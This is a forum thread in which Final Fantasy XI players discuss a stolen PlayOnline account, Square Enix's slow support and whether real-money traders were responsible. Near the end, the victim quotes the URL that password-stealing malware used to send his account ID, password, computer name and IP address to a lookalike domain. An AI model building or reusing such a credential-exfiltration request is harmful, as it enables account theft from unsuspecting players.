[Hannibal_leviathan]

I'm starting to think it wasn't RMT, but just someone like Taj that did this. He had stolen a number of accounts from some server and moved them all to Leviathan a while back. I got the virus or whatever it was from Somepage, but it was able to get my password from my hard drive without ever asking me to enter it again so it wasn't really a key logger.

On Leviathan my character's name was Hannibal and it was stolen on December 15th. I called SE the following Monday and to this day, they have still not returned it despite me having all the registration codes and account information history. My brother-in-law had his WoW account stolen in the same manner, but Blizzard returned it to him and everything he had on it within 24 hours. WoW may suck, but Blizzard's Customer Service blows SE away.

I was 75 NIN and BST, Tall hume with brown topknot haircut. The notable rare/ex equipment I had were Haidate, v belt, peacock amulet, rajas ring, brutal, suppa, koga gloves, B. kote.
Seen anyone that fits that description? Whoever stole it and moved it to Ifrit also got it banned sometime later.

[Phlow]

lol at the "IT WAS TAJ!!" comment. If your password is "stored" so you don't have to input it (and therefore IMPERVIOUS TO KEYLOGGERS!!!!), just where do you think that password is "stored"?

Holy shit, EUREKA! MY HD!

Mine your HD, and you have a stored password. (or more if you've stored more pw's than just your own...)

[Hannibal_leviathan]

I never wrote "It was TAJ". I wrote it was someone like Taj. He also stole multiple accounts and transfered them to his server to sell all their stuff and/or use their characters.

Phlow :
If your password is "stored" so you don't have to input it (and therefore IMPERVIOUS TO KEYLOGGERS!!!!), just where do you think that password is "stored"?

Holy shit, EUREKA! MY HD!

Isn't that what I wrote? The program that stole my password got it off my hard drive. I think normally when you store a password on your computer, it is in an encrypted format. So for a program to be able to steal it without prompting me to reenter it, the password was either stored un-encrypted or poorly encrypted by Playonline. Also, I wasn't implying that I was impervious to key loggers. I just wanted to emphasize that in this case it wasn't a key logger.

[Phlow]

Yarg, I was drunk when I lashed out like that. Apologies.

What I was getting at is that there are shit loads of ways to backdoor into and steal a password; just because RMT didn't use the same method twice doesn't mean it wasn't RMT.

Taj, from what I remember, did that to an LS that was known for botting, though he did rape several innocent people in the LS. Regardless, he gave the characters back.

The reason for the angst in the previous post was because I deal with stupid people that are somehow allowed on computers. The mentality that there is one guy out there in some dark hovel writing virus scripts for the fucking hell of being malicious is a remarkably common idea (not that you are one of these people; the remark about Taj simply reminded me of that). It makes me want to shake babies each time someone resorts to this ideal of a centralized source of pure evil. People do things for a reason. If you were randomly selected (which is safe to assume if you truly did get the virus from Somepage), then more likely than not the reasoning behind it was monetary gain.

So if it wasn't RMT, who would write a malicious virus and mass distribute it? I mean, they would have a shit load of gil, more than they could really do anything with in game.

And anything can be decrypted. It just takes time and proper algorithms.

[Hannibal_leviathan]

Yeah, it probably was RMT but I wonder why so many of them were moved to Ifrit.

I found a file in my temporary internet files with a web address that my ID + password was sent to:
http://www. mioroscft. com/fff/mail.asp?sid=ff11fly&id=MYACCOUNT&pw=PASSWORD&appe=MYCOMPUTERNAME;MYIPADDRESS;Xp;E.8

Where MYACCOUNT was my POL account, PASSWORD was my password, MYCOMPUTERNAME was the name of my computer and then my IP.

and www . mioroscft . com had all chinese writing on it but now it's gone